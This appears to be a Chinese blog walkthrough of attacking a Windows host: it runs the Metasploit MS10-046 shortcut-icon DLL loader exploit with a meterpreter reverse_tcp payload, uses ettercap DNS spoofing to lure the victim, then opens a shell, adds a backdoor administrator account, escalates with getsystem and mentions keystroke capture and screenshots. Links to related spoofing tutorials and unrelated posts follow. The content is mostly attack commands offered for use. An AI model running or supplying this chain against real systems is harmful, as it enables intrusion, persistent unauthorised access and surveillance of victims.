ms10_046_shortcut_icon_dllloader漏洞利用和ettercap dns欺骗
ms10_046_shortcut_icon_dllloader漏洞利用过程
- msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
- msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
- msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.107
- msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.107
- msf exploit(ms10_046_shortcut_icon_dllloader) > show options
- msf exploit(ms10_046_shortcut_icon_dllloader) > exploit 
ettercap dns欺骗
- root@bt:~# cd /usr/local/share/ettercap/
- root@bt:/usr/local/share/ettercap# vim etter.dns //在最后一行添加需要欺骗的域名,如下图 
- root@bt:/usr/local/share/ettercap# ettercap -T -q -i eth0 -P dns_spoof /192.168.1.102/ //        //开始dns欺骗 
利用结果显示
- 清空受害机器dns缓存: 
- 受害主机访问www.baidu.com: 
- Ettcap终端显示: 
- 漏洞利用终端显示:
漏洞利用成功,开始利用
- msf exploit(ms10_046_shortcut_icon_dllloader) > sessions //在漏洞利用终端输入,可以看到建立的会话
- msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1 //进入会话
- meterpreter > shell //进入cmd shell
- 拿到cmd shell后就可以对受害主机进行基本控制。如:net user newuser password /add //添加用户 net localgroup administrators newuser /add //增加权限 exit //退出cmd,返回会话 
- meterpreter > ps //列出受害主机进程
- meterpreter > getuid //查看我当前拥有的权限 
- meterpreter > getsystem //提权 
- meterpreter > help //查看其他命令,可以键盘捕获,截屏等等其他强大功能 
ms10_046_shortcut_icon_dllloader漏洞利用和ettercap dns欺骗的更多相关文章
- 从零开始学安全(四十五)●browser_autopwn2漏洞利用配合Ettercap工具实施DNS欺骗攻击
		系统:kali 2019 工具Ettercap,Metasploit 环境内网地址 首先 cd /etc/ettercap/ 移动在ettercap 文件下 在用vim 打开编辑 etter.dns ... 
- 针对SSL/TLS的拒绝服务攻击以及使用ettercap进行DNS欺骗
		一. thc-ssl-dos 1.简介 (1).SSL 协商加密对性能开销增加,大量握手请求会导致 DOS (2).利用 SSL secure Renegotiation 特性,在单一 TCP 连接中 ... 
- Ettercap之ARP+DNS欺骗
		1.网络攻击拓扑环境 网关:192.168.133.2 攻击者:192.168.133.128 受害者:192.168.133.137 2.原理讲解 ARP欺骗 简介:ARP(Address Reso ... 
- kali Linux 渗透测试 | ettercap图形界面(ARP 欺骗 + DNS欺骗)
		上次我们使用 arpspoof 工具在命令行中完成了 arp 欺骗实验,今天我们用另一种工具 ettercap 工具来实现.ettercap支持图形化操作,对新手非常友好,并且操作非常简单, ette ... 
- ettercap局域网内DNS欺骗(隔壁的哥们轻一点 ...)
		转自:http://www.cnblogs.com/hkleak/p/5043063.html 笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具 ... 
- Kali下Ettercap 使用教程+DNS欺骗攻击
		一.Ettercap 使用教程 EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具.它具有动态连接嗅探.动态内容过滤和许多其他有趣的技巧.它支持对许多协议的主动和被动分析,并包含许多用于网络和 ... 
- ettercap局域网DNS欺骗实现过程
		转载:https://www.cnblogs.com/hkleak/p/5043063.html 笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工 ... 
- Kali Linux渗透基础知识整理(三):漏洞利用
		漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ... 
- 初试钓鱼工具Weeman+DNS欺骗的使用
		下午无聊再网上闲逛随意看了下,自己做了一次测试,目前最新的版本是1.6.Weeman是一款运行在Python环境下的钓鱼渗透测试工具 但这款工具简单易用,安装简单,可伪造HTML页面等等...网上看了 ... 
随机推荐
- iOS TextField输入框点击键盘时随着键盘上移
			-(void)textFieldDidBeginEditing:(UITextField *)textField { CGRect frame = textField.frame; int offse ... 
- eclipse中向左缩进快捷键
			总是忘记,还是记下来吧,以后查找方便 Shift + Tab 
- Linux中ls命令详解
			ls命令是linux下最常用的命令之一,ls跟dos下的dir命令是一样的都是用来列出目录下的文件,下面我们就来一起看看ls的用法 英文全名:List即列表的意思,当我们学习某种东西的时候要做到知其所 ... 
- hdu_3182_Hamburger Magi(状压DP)
			题目连接:http://acm.hdu.edu.cn/showproblem.php?pid=3182 题意:有n个汉堡,做每个汉堡需要消耗一定的能量,每个汉堡对应一定的价值,且只能做一次,并且做当前 ... 
- openwrt 包makefile
			$() 表示要执行的一条语句 $(if 条件, 成立执行, 失败执行) if条件分支 $(foreach 变量, 成员列表, 执行体) 成员遍历语句 可以看出,语句是可以嵌套使用的. ... 
- crossdomain 可用
			<cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request-h ... 
- 兼容IE低版本
			1,IE6PNG透明的bug,只需要把png图另存为无杂边的png-8格式 2,在IE6用overflow:hidden清除浮动,要加上zoom:1 3,IE6下盒子的最小高度为20px 如果要小于2 ... 
- PHP问答题大全
			答案在题目后面,文字与背景同色,连续单机三次鼠标一行出答案哦: 1.PHP有几种原始数据类型,分别是什么?答:八种,分别是:int,float,string,bool,array,object,res ... 
- linux下MMC/SD/SDIO驱动系列之二 ---- host注册过程(一)
			参考了 http://blog.csdn.net/xieweihua2012/article/details/12844733 在他的基础上更详细的解析源 ...................... ... 
- 扫描局域网内的ip和主机名
			1. 目的 今天发现我配置的一台电脑ip被人占用了,所以准备写个程序扫描一下局域网内所有正在使用的ip和主机名 2. 实现--直接上代码 import time import threading im ... 
